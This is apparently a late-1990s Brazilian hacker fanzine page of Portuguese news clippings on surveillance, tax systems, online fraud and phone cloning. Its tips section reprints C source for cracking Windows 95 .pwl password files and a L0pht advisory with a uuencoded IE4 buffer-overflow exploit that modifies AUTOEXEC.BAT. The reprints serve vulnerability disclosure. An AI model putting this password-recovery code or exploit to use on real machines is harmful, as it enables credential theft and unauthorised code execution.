NEWS  -  DICAS - BOATOS - HUMOR - NOVOS BUGS - CARTAS - SEI LÁ ..

Homepage Blog do Fanzine Índice No 17 Índice Números Anteriores drrcunha@yahoo.com.br  

NEWS  -  DICAS - BOATOS - HUMOR - NOVOS BUGS - CARTAS - SEI LÁ ..

http://migre.me/oKPJx

RECEITA TESTA SISTEMA CONTRA SONEGAÇÃO

Objetivo é cruzar informações cadastrais de empresas com declarações de IR de pessoa jurídica

BRASÍLIA - A Secretaria da Receita Federal está montando um sistema integrado para reduzir, ainda mais, as possibilidades de sonegação de impostos federais por parte das empresas. Um projeto piloto já está em execução no Rio, com o objetivo específico de cruzar as informações de cadastro das empresas com as declarações de Imposto de Rednda da Pessoa Jurídica (IRPJ) e co os dados que fornecem por meio de outro documento, denominado Declaração de Contribuições e Tributos Federais (DCTF). Nesse documento a Pessoa Jurídica informa tudo o que pagou de imposto e relaciona eventuais créditos tributários que tem a receber.

Trata-se de uma inovação da Receita para eliminar as brechas que ainda permitem aos proprietários de empresas sonegar imposto como Pessoa Jurídica ou até na condição de Pessoa Física, quando apresentam suas declarações individuais. Montar interligação dos sistemas foi tarefa fácil, pois a Receita opera com 400 programas.

Hoje, esses programas não se comunicam e, para verificar ou cruzar informações, é preciso uma análise específica pelo Serpro. A Receita espera que até o fim de 1998 todos os programas estejam interligados.[...] (Estado de São Paulo, 15/08/97 - Beatriz Abreu e Lu Aiko Otta - seção de Economia)

Espiões Vermelhos

Como a polícia secreta de [..] espionava a oposição, sindicatos e até o PT.

[..] O governador [..] também gosta de se alimentar de informações produzidas na velha arapongagem policial. VEJA teve acesso a 123 relatórios feitos por uma equipe de quarenta policiais militares que formam o braço secreto da PM de Brasília, a PM-2. Nos documentos, constata-se que a polícia secreta do governador se encarrega de espionar reuniões de sindicatos petistas e até encontros de cúpula do próprio PT.

Como é regra nesse serviço, o trabalho dos agentes que se infiltravam em reuniões partidárias era condensado na forma de relatórios. Uma cópia deles ia para o Centro de Informações do Exército, o CIE. Outra era enviada para a Agência Brasileira de Inteligência, Abin, que sucedeu ao SNI. Uma terceira era despachada para o gabinete militar do governador. Lendo-se os relatórios, constata-se que os agentes secretos invadiam propriedade privada e operavam fora das divisas do Distrito Federal. Um dos relatórios, de abril do ano passado, mostra que agentes chegaram a bisbilhotar uma fazenda do deputado distrital e empresário Luiz Estevão, o amigo de Collor e líder da oposição ao governador. [..] A PM-2 formou uma estrutura com 140 pessoas, divididas entre as que saem à rua para trabalhar e aquelas que ficam no escritório batendo papo, o chamado "apoio". Não usavam farda nem iam ao quartel. Não andavam em viaturas, usavam nomes falsos e agiam como personagens de um filme B de espionagem. Também usavam equipamento de filmagem, gravação e armamento. Dentro do Palácio do Buriti há uma sala de cerca de 30 metros quadrados onde fica um computador que armazena parte dos relatórios. A sala, chamada oficialmente de Seção de Apoio Técnico da Casa Militar, fica a menos de cinquenta passos do gabinete do governador. O pedaço mais curioso, batizado de subseção de operações, fica num pequeno prédio, quase oculto, na Esplanada dos Ministérios, próximo ao Ministério da Fazenda. É um lugar cercado de mato alto, onde se revezam trinta agentes. É nesse bunker que os arapongas faziam seus relatórios. [..] Em todos os Estados, a PM tem um braço secreto e não é incomum que extrapole suas funções, entrando no terreno da espionagem e pura bisbilhotice. [..] Quando um governador toma posse não precisa mandar a Secretaria da Fazenda recolher tributos. Isso é uma tarefa automática. No caso do braço secreto da PM acontece o mesmo. A bisbilhotagem segue em que alguém dê uma ordem. O governador pode proibir a atividade, estimula-la ou deixar tudo como está, como quem não sabe de nada.[...]

(VEJA - 25/09/96 - pags 38,39,40 - Policarpo Jr., Brasília)

OLHAR ELETRÔNICO QUE VIGIA SP

Câmeras do CET registram tudo o que se passa em 86 cruzamentos e quatro túneis da cidade.

Sentir-se observado, procurar por toda parte e não encontrar ninguém pode não ser mania de perseguição. Você está mesmo sob olhares atentos, apesar de nem desconfiar disso. Mas o poderoso instrumento da "espionagem", que não perde um detalhe em seu campo de visão de 360 graus e dá zooms inacreditáveis é simples de ser localizado. Basta voltar a cabeça para cima num dos 86 cruzamento ou 4 túneis. Lá estão as câmeras da Companhia de Engenharia de Tráfego (CET).

Nesse momento, técnicos de controle de tráfego (TCT) podem estar captando o movimento on line num dos monitores das centrais espalhadas por São Paulo. Pelas telas das salas sempre na penumbra, esses profissionais têm uma pequena amostra de tudo o que acontece nas ruas da cidade. Imagens sem sons, mas impressionantes. Vão do acidente digno de filme de ação a relações sexuais praticadas por casais dentro de carros parados nos túneis.

Flagrar cenas tão constrangedoras como motoristas da terceira idade estapeando-se após uma batida, é quase um "acidente". [..] "O objetivo é a informação visual do tráfego, fazê-lo fluir", diz o coordenador do Projeto Semáforos Inteligentes da CET, Edgar Linguitte.[..]

Assim que qualquer ocorrência é registrada pela câmera, os técnicos põem o vídeo para funcionar. "Da gravação, podemos tirar estratégias para corrigir os problemas", diz Pulz. [..] Quando aciona o zoom de alguma câmera para socorrer alguém, por um momento o TCT Márcio Donizete tem a sensação de estar invadindo a privacidade das pessoas. "A gente vai no rosto do motorista, vê seus traços", admite Lima, que trabalha na Central da Bela Cintra, "Se há um acidente com duas pessoas, é como se você fosse a terceira, tamanha a realidade das imagens".[..]

Os casais paulistanos, por sua vez, têm escolhido os túneis para namorar. Dentro dos carros, parados nas baias planejadas para emergências, sentem-se protegidos dos curioso e mantêm relações sexuais sem o menor constrangimento.[..] Talvez a situação só seja complicada para o marronzinho que precisa ir ao local e convidar os animados namorados a retomar a viagem.[..] A urbanista Arlete Moyses Rodrigues, livre-docente da Universidade Estadual de Campinas (Unicamp) considera o sistema uma invasão da privacidade. "Esse tipo de fiscalização não acrescenta nada, o que deveria haver era investimento em educação".

(Jornal O Estado de São Paulo, 24/08/97, pags C1 - C4 - Marisa Folgato)

E D U P A G E  26 de agosto de 1997  |  Portugues  ________________________________________________________________________  FRAUDES ON-LINE ENVOLVENDO CARTAO DE CREDITO  Devido ao grande numero de assinantes que inclui muitos iniciantes nas  atividades on-line, a AOL (America Online) vem sendo um alvo facil para  criminosos que tentam cometer fraude; os assinantes da AOL vem recebendo mensagens que objetivam descobrir numeros de cartao de credito.  Em  recente mensagem intitulada "Informacoes Importantes da AOL" e falsamente identificada como vinda do Departamento de Assinaturas da AOL, os  destinatarios das mensagens foram convidados a entrar na pagina da AOL na Web e fornecer seus nomes e numero de cartao de credito.  Washington Post 26 ago 97   ________________________________________________________________________  JUIZA DECIDE QUE CONTROLES DE EXPORTACAO DE CRIPTOGRAFIA VIOLAM  LIBERDADE DE EXPRESSAO  Uma juiza de um Tribunal Distrital dos EUA decidiu que as restricoes,  recentemente revisadas pelo Governo Clinton, sobre exportacao de  software de criptografia, sao inconstitucionais.  Em dezembro, ela  determinou que uma versao submetida era inconstitucional.  A decisao da  juiza foi baseada em sua crenca de que codigos de computadores sao  formas de expressao, "como musica e equacoes matematicas", e  restringi-las constitui uma violacao da liberdade de expressao.  Alem  disso, a nova regulamentacao, assim com as antigas, nao estabelece  prazos ou padroes para as decisoes sobre licencas concedidas pelo  governo e nao preve a revisao judicial.  A decisao "tera' um forte  impacto na lideranca dos EUA na industria de software e do comercio  eletronico", comentou um representante da Electronic Frontier  Foundation", e um impacto enorme na questao do direito 'a privacidade  nos proximos 100 anos".  AP 26 ago 97    ______________________________________________________________________  CRACKER SE DECLARA CULPADO POR ROUBO DE INFORMACOES DE CARTAO DE CREDITO  Um cracker de computador, acusado de roubar mais de 100.000 numeros de  cartao de credito de empresas que vendem produtos pela Internet,  declarou-se culpado antes da data do julgamento e podera' pegar 30 anos  de prisao e multas de ate' US$ 1 milhao.  A sentenca esta' prevista para  ser proferida em 25 de novembro desse ano.  AP 26 ago 97   ________________________________________________________________________   17 de agosto de 1997  |  Portugues ________________________________________________________________________  PROBLEMAS DE SEGURANCA  Dois dias apos a Experian Inc. (bureau de credito conhecido no passado  como TRW Information Systems & Services) ter comecado a permitir que os  clientes utilizassem a Internet para consultar seus relatorios pessoais  de credito, a empresa repentinamente interrompeu a prestacao do servico  apos ter tomado conhecimento de que quatro pessoas obtiveram informacoes  financeiras sobre terceiros.  A professora de computacao da Universidade  de Georgetown, Dorothy Denning, declarou que a experiencia da Experian  "mostra como e' dificil a seguranca on-line no caso de prestacao de servicos de acesso a informacoes".  Washington Post 16 ago 97   ________________________________________________________________________  INDIVIDUO DELATADO POR PROVEDORA DE ACESSO E' PRESO POR PORNOGRAFIA  Uma provedora de servico Internet nao identificada, que auditava a conta  de um individuo do Colorado "por razoes de negocios", alertou a policia  de que tal individuo havia baixado mais de 70 fotos coloridas de adultos  praticando sexo com criancas.  Estar em posse de material sobre  pornografia infantil e' ma' conduta, e produzir e distribuir tal material e' crime; o individuo foi preso.  Dave Banisar, do Centro de  Informacoes Eletronicas de Privacidade levantou a questao da  privacidade.  "As provedoras de servico nao devem fazer esse tipo de  coisa.  Elas sao como as companhias telefonicas, que nao tem acesso 'as  conversas telefonicas.    AP 16 ago 97  ________________________________________________________________________  HORA DE SE DESCONECTAR! AGORA! ENQUANTO E' TEMPO! SERIO MESMO!  A psicologa da Universidade de Pittsburgh, Kimberly S. Young,  acha que as "salas de bate-papo" do ciberespaco e os jogos de fantasia  constituem as principais atracoes para as pessoas propensas a se  "viciarem" na Internet.  "Como nos bares de encontros, onde todos acabam  conhecendo seus nomes".  Young comentou que vem sendo contatada por  advogados a respeito de divorcios causados pelo vicio de um dos conjuges  na Rede.  AP 15 ago 97 

E D U P A G E

2 de outubro de 1997 | Portugues

________________________________________________________________________

"GERENTE DE CONHECIMENTOS": O MAIS NOVO ALIADO DA TECNOLOGIA

O novo cargo que esta' crescendo nos circulos da tecnologia da informacao e' o de "Gerente de Conhecimentos". A descricao do cargo se concentra em trazer negocios em potencial e conhecimentos tecnicos para melhorar a posicao da empresa na concorrencia e envolve nao apenas localizar como tambem organizar, manipular, filtrar e apresentar informacoes de forma que os empregados na linha de frente possam compreende-las e utiliza-las. Hal Varian, decano da Faculdade de Administracao de Informacao e Sistemas da Universidade de Berkeley, na California, comentou que existe uma grande quantidade de informacoes com que conta uma empresa e e' necessario estruturar tais recursos para que sejam uteis". Fornecer essa estrutura e trabalhar com o lado tecnico da empresa para tornar os recursos de informacao disponiveis e uteis aos empregados sera', cada vez mais, um elemento chave para a maioria das empresas nos proximos anos.

Information Week 29 set 97

________________________________________________________________________

SINDROME DA FADIGA POR EXCESSO DE INFORMACAO - PERIGOSO PARA A SAUDE

O fenomeno de contrair enfermidades como resultado do estresse causado por uma sobrecarga de informacoes tem agora um nome oficial - Sindrome da fadiga por excesso de informacao - e, de acordo com um relatorio do Reuters Business Information de 1996, quase metade dos gerentes de primeira linha e um terco de todos os gerentes sofrem dessa sindrome.

Investor's Business Daily 1 out 97

E D U P A G E

9 de novembro de 1997 | Portugues

O ESTADO DO TEXAS DOS EUA PROCESSA MICROSOFT

O estado do Texas - onde fica a matriz da Compaq e da Dell, duas das maiores fabricantes de computadores do mundo, esta' processando a Microsoft por interferir na investigacao do estado de possivel infracao da lei anti-monopolista da Microsoft, e os representantes do estado estao furiosos com a Microsoft por esta nao liberar os fabricantes das clausulas de "sigilo" contidas nos contratos de licenca. O procurador do geral do estado comentou: "O dominio exagerado de mercado exercido pela Microsoft intimida os fabricantes de computadores, cuja sobrevivencia depende essencialmente do acesso ao software de sistema operacional da Microsoft, que roda em 90% de todos os computadores pessoais vendidos hoje em dia. Os fabricantes estao com medo de passar informacoes porque nao ha' como eles as passarem confidencialmente". A Microsoft responde: "Permanecemos dispostos a discutir quaisquer conciliacoes que acomodem adequadamente os interesses da Microsoft em relacao 'a divulgacao de informacoes potenciais de sua propriedade... O codigo e os termos sob os quais se licencia esse codigo a outros constituem ativos criticos de qualquer empresa que esteja no ramo de software. Assim sendo, e' muito importante que se assegure a protecao adequada a esses ativos".

New York Times 8 nov 97

________________________________________________________________________

E D U P A G E 9 de novembro de 1997 | Portugues O ESTADO DO TEXAS DOS EUA PROCESSA MICROSOFT O estado do Texas - onde fica a matriz da Compaq e da Dell, duas das maiores fabricantes de computadores do mundo, esta' processando a Microsoft por interferir na investigacao do estado de possivel infracao da lei anti-monopolista da Microsoft, e os representantes do estado estao furiosos com a Microsoft por esta nao liberar os fabricantes das clausulas de "sigilo" contidas nos contratos de licenca. O procurador do geral do estado comentou: "O dominio exagerado de mercado exercido pela Microsoft intimida os fabricantes de computadores, cuja sobrevivencia depende essencialmente do acesso ao software de sistema operacional da Microsoft, que roda em 90% de todos os computadores pessoais vendidos hoje em dia. Os fabricantes estao com medo de passar informacoes porque nao ha' como eles as passarem confidencialmente". A Microsoft responde: "Permanecemos dispostos a discutir quaisquer conciliacoes que acomodem adequadamente os interesses da Microsoft em relacao 'a divulgacao de informacoes potenciais de sua propriedade... O codigo e os termos sob os quais se licencia esse codigo a outros constituem ativos criticos de qualquer empresa que esteja no ramo de software. Assim sendo, e' muito importante que se assegure a protecao adequada a esses ativos". New York Times 8 nov 97 ________________________________________________________________________   E D U P A G E  6 de novembro de 1997  |  Portugues ________________________________________________________________________  LEGISLACAO PARA ROUBO CIBERNETICO COLOCARIA ATE' ROBIN HOOD NA CADEIA  De acordo com um projeto de lei introduzido pela Camara de Deputados  dos EUA pelo congressista Bob Goodlatte (republicado pelo estado da  Virginia), qualquer pessoa que utilize a Rede para se apropriar  indevidamente de trabalhos patenteados estara' cometendo uma infracao  federal, seja qual for o objetivo do ato - lucro pessoal ou nao.  A  inspiracao para essa legislacao veio de um julgamento de um caso em  Massachusetts em que um estudante deixou 'a disposicao do publico, em  um boletim eletronico, um software comercial.  AP 6 nov 97 ________________________________________________________________________  MCNEALY CONTRA GATES  O executivo da Sun, Scott McNealy, fez um apelo aos apoiadores da  linguagem Java para que enviassem uma "enxurrada" de mensagens  eletronicas para Bill Gates registrando que "queremos 100% Java".  Ele  comentou:  "A Microsoft nao e' mais distribuidora de plataformas Java.   As pessoas estao confusas, com a impressao que existem duas versoes da  Java.  Isso nao e' verdade, so' existe uma: Java pura ...  Ao se pingar  tres gotas de veneno em uma aplicacao 100% Java,  obtem-se ... Windows.   Ao se pingar tres gotas de Java em Windows, ainda obtem-se Windows."   Tod Nielsen, executivo da Microsoft, respondeu 'as acusacoes de  McNealy assim:  "A diretoria da Sun deveria lavar a boca com sabao.   Se minha filha de cinco anos falasse dessa forma ela estaria soltando  bolhas de sabao pela boca".  New York Times Cybertimes 6 nov 97   ________________________________________________________________________ 

O CASAL DA INTERNET

São Paulo, segunda, 20 de outubro de 1997.

-----------------------

NAMORO VIRTUAL

Eles estavam em um hotel

Casal da Internet é achado vivo no PI

e do NP

Policiais de Teresina (PI) prenderam anteontem, às 7h, o goiano Oliveira e Silva, que há 12 dias havia sumido com a artista Carla Patrícia Coelho, que mora em Campo Grande (MS).

[..]

Silva e Carla foram encontrados na ???????? ??????? Hotel, na BR-316. Ele foi preso em flagrante e autuado por de automóvel. "Ele furtou um carro em Fortaleza para fugir a artista plástica", disse o delegado.

[..]

"Caí num abismo. Não sei se conseguirei acreditar nas pessoas",afirmou Carla.

------------------------

São Paulo, terça, 21 de outubro de 1997.

Plano de internautas era se casar ntem

(PAULO MOTA da Agência Folha, em Fortaleza RUBENS VALENTE da Agência Folha, em Campo Grande)

O desempregado Flávio de Oliveira e Silva, 36, e a artista plástica Carla Patrícia Coelho, 29, que se conheceram pela Internet e passaram 13 dias desaparecidos, tinham planejado se casar ontem, numa "grande festa à moda cigana", em Campo Grande(MS). "Ele (Silva) disse que iria aproveitar o aniversário dele hoje (ontem) e fazer uma festa só", afirmou Carla.

Os dois foram encontrados pela polícia anteontem num hotel, em Teresina (PI). Eles estavam sem dar notícias a parentes desde 8 de outubro, quando saíram de um hotel luxuoso em Fortaleza (CE) sem pagar a conta de R$ 1.700. Silva foi preso em flagrante, acusado de estelionato e não quis falar com a Agência Folha. A polícia acredita que Carla foi enganada por Silva e considerou-a inocente.

[..]

O casal se encontrou em 2 de outubro, em Goiânia, e embarcou para Fortaleza, para uma "viagem de lua-de-mel". A hospedagem foi numa suíte com vista para o mar e diária de R$ 273. Usando um carro alugado em Fortaleza, o casal acumulou dívida de R$ 4.800 em despesas e hospedagens em hotéis de praias como Jericoacoara (CE), Parnaíba (PI) e São Luiz (MA). As contas foram pagas com cheques e cartões de Carla, que confiava num depósito de R$ 10 mil que Silva havia feito em sua conta. O cheque depositado era roubado de outra conta da própria Carla.

Ela diz que só descobriu que Silva estava mentindo quando a polícia os abordou em Teresina.

FOLHA DE São Paulo, domingo, 13 de julho de 1997.

EMPREGADO LADRÃO

perfil do funcionário desonesto aplica mais golpes no trabalho

PIVETTA

Reportagem Local

Pesquisa feita pelo especialista em fraudes e crimes financeiros

Marcelo Alcides Gomes, 33, traçou o perfil do empregado que rouba ou dá golpes na empresa em que trabalha. De acordo com dados preliminares da pesquisa, o golpista típico é o homem casado, com idade entre 31 e 40 anos, que ocupa um cargo abaixo do nível de gerência e terminou apenas o segundo grau.

As mulheres aparecem na pesquisa como sendo autoras de apenas 16,7% dos delitos cometidos nas empresas. Primeiro brasileiro a ser aceito como membro da Association of Certified Fraud Examiners (associação de investigadores de fraudes em empresas) -que reúne 13 mil associados e é sediada nos EUA-, Gomes enviou questionários a 1.500 empresas brasileiras (inclusive as 500 maiores) e recebeu, até agora, resposta de 735 companhias.

A pesquisa constatou algum tipo de golpe ou desfalque cometido por funcionários em 717 (97,5%) das 735 empresas. "Apesar de a maioria dos crimes serem cometidos por empregados com nível inferior ao de gerente e sem curso superior, os maiores desfalques, em termos financeiros, tendem a ser feitos por profissionais com cargo de gerência ou diretoria e curso superior completo", afirmou Gomes.

revista VEJA 08-10-97                    Daniel Nunes Gonçalves

A estudante paulista Alessandra Massis comprou um telefone celular há sete meses. Ela utiliza o aparelho com comedimento e raramente faz ligações interurbanas. Chamada internacional, nem pensar. Sua conta é a tradução de seus hábitos: 60 reais, no máximo. A fatura de março, portanto, só podia deixá-la de cabelo em pé: 13.571 reais. "Quase morri de susto", diz a estudante. A conta acusava 1.032 ligações para 36 países, do Kuwait à Colômbia, passando pela Suíça e Afeganistão. Alessandra procurou a empresa telefônica do Estado de São Paulo, Telesp, e convenceu os funcionários a dispensá-la do pagamento.[..] . A cada trinta minutos, a companhia recebe a visita de um dono de celular apavorado com contas astronômicas, fruto de ligações que dizem não ter feito, todos vítimas de uma fraude que só faz crescer clonagem. Os clones são telefones não registrados, programados para debitar suas chamadas na conta de pessoas desavisadas, como Alessandra.

[..]

Desde o início do ano foram registrados milhares de casos de clonagem. Fala-se num prejuízo estimado em 60 milhões de reais para as teles, que poupam os clientes do pagamento mas têm de pagar à Embratel e às telefônicas internacionais pelas chamadas efetuadas.

[..]

Para programar um celular frio para debitar suas chamadas na conta de um celular quente é preciso ser técnico em eletrônica e comprar um equipamento de rádio portátil   chamado scanner, que custa 400 reais e registra a   freqüência em que operam os celulares à sua volta.

[..]

Para dar alguma segurança ao usuário, a Embratel contratou uma firma americana, a Digital, que vai instalar um sistema antifraude orçado em 14 milhões de reais. O sistema, empregado na França e na Itália, compara cada nova ligação feita com o histórico de chamadas da pessoa. "Se alguém só faz ligações nacionais e surge uma chamada internacional de uma hora, o computador dispara um alarme. Aí, entramos em contato com o usuário para checar a autoria do telefonema", informa José Carlos Gabarra, da Digital. O novo sistema deve estar operando até março do ano que vem

BUGS e DICAS

------- start of forwarded message (RFC 934 encapsulation) -------

From: Frank Andrew Stevenson <frank@funcom.no>

To: cypherpunks@toad.com

Subject: Cracked: WINDOWS.PWL

Date: Mon, 4 Dec 1995 17:51:36 +0100 (MET)

A few days ago Peter Gutmann posted a description on how Windows 95 produces RC4 keys of 32 bits size to protect the .pwl files. I verified the information and wrote a program to decrypt .pwl files with a known password, I then discovered that the .pwl files where well suited for a known plaintext attack as the 20 first bytes are completely predictable.

The 20 first bytes of any .pwl files contains the username, which

is the same as the filename, in capitals, padded with 0x00. From then I wrote a program to bruteforce the .pwl file and optimized it so it would run in less than 24 hours on an SGI. I run a test of the bruter software and recovered an unknown rc4 key in 8 hours, but the decrypted file was still largely uninteligeble, I then proceeded to decrypt the file at all possible starting points, and discovered valuable information (cleartext passwords) offset in the file.

This has enormous implications: RC4 is a stream cipher, it generates a long pseudo random stream that it uses to XOR the data byte by byte. This isn't neccecaraly weak encryption if you don't use the same stream twice: however WIN95 does, every resource is XORed with the same pseudo random stream. What's more the 20 first bytes are easy to guess. This is easy to exploit: XOR the 20 bytes starting at position 0x208 with the user name in uppercase, and slide this string through the rest of the file (xoring it with whatever is there) this reveals the 20 first bytes of the different resources.

>From there I went on to study the structure of the .pwl file it is

something like this (decrypted):

USERNAME.........wpwpwpwpwpwpwpwpwpwp

rs???????

rs

rs

rs???????????

rs???????

where wp is i word pointer to the different resources (from start of pwl file) The 2 first bytes of the resource (rs) is its length in bytes (of course XOR with RC4 output) It is the fairly easy to find all the resource pointers by jumping from start of resource to next resource, had it not been for the fact that the size sometimes is incorrect (courtesy of M$)

What follows is a short c program that tries to remedy this and reconstruct the pointertable thus generating at least 54 bytes of the RC4 pseudorandom stream, and then proceedes to decrypt as much as possible from the different resources. What does this show? Although RC4 is a fairly strong cipher, it has the

same limitations as any XOR streamcipher, and implementing it without sufficient knowledge can have dire consequences. I strongly suggest that the programmers at Microsoft do their homework before trying anything like this again!

DISCLAIMER:

This is a quick hack, I don't make any claims about usefulness for any purpose, nor do I take responsibility for use nor consequences of use of the software. FUNCOM of Norway is not responsible for any of this, (I speak for myself, and let others speak for themselves) This source is hereby placed in the public domain, please improve if you can.

- --- glide.c ---

#include <stdio.h>

#include <string.h>

unsigned char Data[100001];

unsigned char keystream[1001];

int Rpoint[300];

main (int argc,char *argv[]) {

FILE *fd;

int i,j,k;

int size;

char ch;

char *name;

int cracked;

int sizemask;

int maxr;

int rsz;

int pos;

int Rall[300]; /* resource allocation table */

if (argc<2) {

printf("usage: glide filename (username)");

exit(1);

}

/* read PWL file */

fd=fopen(argv[1],"rb");

if(fd==NULL) {

printf("can't open file %s",argv[2]);

exit(1);

}

size=0;

while(!feof(fd)) {

Data[size++]=fgetc(fd);

}

size--;

fclose(fd);

/* find username */

name=argv[1];

if(argc>2) name=argv[2];

printf("Username: %s\n",name);

/* copy encrypted text into keystream */

cracked=size-0x0208;

if(cracked<0) cracked=0;

if(cracked>1000) cracked=1000;

memcpy(keystream,Data+0x208,cracked );

/* generate 20 bytes of keystream */

for(i=0;i<20;i++) {

ch=toupper(name[i]);

if(ch==0) break;

if(ch=='.') break;

keystream[i]^=ch;

};

cracked=20;

/* find allocated resources */

sizemask=keystream[0]+(keystream[1]<<8);

printf("Sizemask: %04X\n",sizemask);

for(i=0;i<256;i++) Rall[i]=0;

maxr=0;

for(i=0x108;i<0x208;i++) {

if(Data[i]!=0xff) {

Rall[Data[i]]++;

if (Data[i]>maxr) maxr=Data[i];

}

}

maxr=(((maxr/16)+1)*16); /* resource pointer table size

appears to be

divisible by 16 */

/* search after resources */

Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */

for(i=0;i<maxr;i++) {

/* find size of current resource */

pos=Rpoint[i];

rsz=Data[pos]+(Data[pos+1]<<8);

rsz^=sizemask;

printf("Analyzing block with size:

%04x\t(%d:%d)\n",rsz,i,Rall[i]);

if( (Rall[i]==0) && (rsz!=0) ) {

printf("unused resource has nonzero size !!!\n");

exit(0);

}

pos+=rsz;

/* Resources have a tendency to have the wrong size for

some reason */

/* check for correct size */

if(i<maxr-1) {

while(Data[pos+3]!=keystream[1]) {

printf(":(%02x)",Data[pos+3]);

pos+=2; /* very rude may fail */

}

}

pos+=2; /* include pointer in size */

Rpoint[i+1]=pos;

}

Rpoint[maxr]=size;

/* insert Table data into keystream */

for(i=0;i <= maxr;i++) {

keystream[20+2*i]^=Rpoint[i] & 0x00ff;

keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;

}

cracked+=maxr*2+2;

printf("%d bytes of keystream recovered\n",cracked);

/* decrypt resources */

for(i=0;i < maxr;i++) {

rsz=Rpoint[i+1]-Rpoint[i];

if (rsz>cracked) rsz=cracked;

printf("Resource[%d] (%d)\n",i,rsz);

for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);

printf("\n");

}

exit(0);

}

- --- end ---

#include <std/disclaimer.h>

E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key

* * * * * * * * * * * * * * * * * * * *

_______________________________________________________________

       Document: L0pht Security Advisory

   URL Origin:  http://l0pht.com/advisories.html   Release Date:  November 1st, 1997    Application:  Microsoft Internet Explorer 4.0 Suite       Severity:  Viewing remote HTML content can execute arbitrary native code         Author:  dildog@l0pht.com  Operating Sys:  Windows 95  -------------------------------------------------------------------------------   ========  Scenario  ========    The Microsoft Internet Explorer 4.0 Suite, including all programs supplied   with it that read and/or process HTML from either local machines, intranet   machines, or remote internet machines are subject to a buffer overflow in the   HTML decoding process. The buffer overflow can cause the application to page   fault, or in the worst case, execute arbitrary precompiled native code.   =======  Example  =======    1. Copy the supplied HTML file(s) into a location that is accessible via the      target application.   2. Point to it. Look at it.   3. Click on the link. (or let someone click it for you)   4. Become aware of what happens to your machine.   5. Freak out and beg Microsoft to make the bad man stop.   =================  Technical Details  =================    The problem here lies in the deciphering of the URL line format itself. The   base HTML library that is used by the Internet Explorer 4.0 Suite and the   following programs are vulnerable:          - Outlook Express (both mail and news)         - Windows Explorer         - Internet Explorer (different than regular explorer, really)    This problem, because it stems from a programming flaw in the HTML decoding   system, is unaffected by the Explorer "Security Zones" feature. In other   words, if you turn on the highest security level for the zone from where the   exploit HTML is being viewed, you are still vulnerable.    The critical problem here is a buffer overflow in the parsing of a particular   new type of URL protocol. The "res://" type of URL is meant to allow access   to a local resource embedded in a local DLL file. This is useful for   archiving entire websites into a DLL and is not, in its truest concept, a   security flaw.    For example, to read something out of the IE4.0 Tour (stored in a DLL) try   the following URL: res://ie4tour.dll/page1-6.htm    The buffer overflow is on the actual filename specified. To crash your   machine go ahead and try res://blahblahblah ... blahblah/ in your Internet   Explorer window where the amount of 'blah' equals 265 characters.    The function that goes through the filename and validates it is flawed on   Windows 95. Without checking the length, the filename is uppercased,   concatenated with '.DLL' if it isn't there already, and in the process,   copied into a fixed size buffer.   ========  Solution  ========    Currently, there is no solution available for this flaw. You can't set any   Internet Explorer options to avoid it, and you are not protected by any   level of zone security. Simply don't surf the web, read email or view   net news using Internet Explorer 4.0 until Microsoft puts up a hotfix.   ============  Exploit Code  ============       Here we go...     When constructing the exploit we want to try something useful.     Lets's start with appending text of your choice to AUTOEXEC.BAT...     (note that running native code lets you do pretty much anything you want)      Note that the location of the exploit string in the stack is very important     and it varies from target application to target application.      Constructing the exploit string:     Figure out stack location for exploit code...          App                     Loc         Internet Explorer       0x0057C144         Windows Explorer        0x0088A0F4         ...      Yeah, I know that those locations have null bytes in them and you can't     put those (or lowercase letters, or CR/LF or 0x07 or anything like that)     in the exploit string... but we'll let microsoft fix that for us. Step thru     the process to see IE add that extra null character for you. Will they     ever cease to amaze...      Put together what you wanna do, tack on the necessary jump addresses and     all that. That's it.   And now, UUENCODED to preserve freshness:  ************************************************************************* * MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_      * * REGULAR OL' WINDOWS EXPLORER. (put it on a website and download it or * * click on the IE desktop icon (run iexplore.exe) and type in the name  * * of the file into the URL line)  IT WON'T WORK OTHERWISE!!!!           * *                                (though it could be made to do so)     * *************************************************************************  ----====/ SNIP  section 1 of uuencode 5.20 of file infect.htm    by R.E.M.  begin 644 infect.htm M/&AT;6P^#0H\:&5A9#X-"CQT:71L93X-"DEN=&5R;F5T($5X<&QO:71E<@T* M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT M/2,P,#`P,#`^#0H-"CQC96YT97(^#0H\:#$^5VAA="!D;R!)('=A;G0@=&\@ M:6YF96-T('1O9&%Y/SPO:#$^#0H-"D-L:6-K(&AE<F4@=&\@;6]D:69Y(&%U M=&]E>&5C+F)A=#QP/@T*#0H\82!H<F5F/2(-"G)E<SHO+[C$0=B`+8"`@("0 MD)"0D)"+V#/)@,&J`]FQ7XH3@.)_B!-#XO:0D)"0D%"0D&H"D)"0NNW"6`&! MZ@$!`0&04KNW\O>_@.^`_]-:6E"0D#/;LP)3@^L$4U"[X(#YO__3@^P,D%A0 M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O M^+__TY"0D,S,+2TM+2TM+2TM+2TM+4,Z7$%55$]%6$5#+D)!5("-BD5#2$\@ M34E#4D\D3T94(#!73EH@64]5+BXN(%)%4$5.5"!!3D0@0D4@4T%6140AC8I0 M055318V*@"TM+2TM+2TM+2TM+2TM+2U!04%!0D)"0D,!(+Z_1$1$143!5R\- M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\ M9F]N="!S:7IE/2LV/CT\+V9O;G0^/&9O;G0@9F%C93TB5VEN9V1I;F=S(B!S M:7IE/2LV/B9G=#PO9F]N=#X-"CPO83X-"@T*/"]C96YT97(^#0H-"CPO8F]D ->3X-"CPO:'1M;#X-"CX- ` end sum -r/size 62455/917 section (from "begin" to "end") sum -r/size 5779/643 entire input file  /====---- SNIP   A haiku:   Microsoft IE  Is there no security?  Not if you ask me.  dildog@l0pht.com (11/1/97)  -------------------------------------------------------------------------------  For more L0pht (that's L - zero - P - H - T) advisories check out: http://l0pht.com/advisories.html

ANTI-SPAM SOFTWARE

http://members.aol.com/macabrus/utilities.html

http://rs.internic.net/cgi-bin/whois          Whois

http://www.net.cmu.edu/bin/traceroute      Traceroute

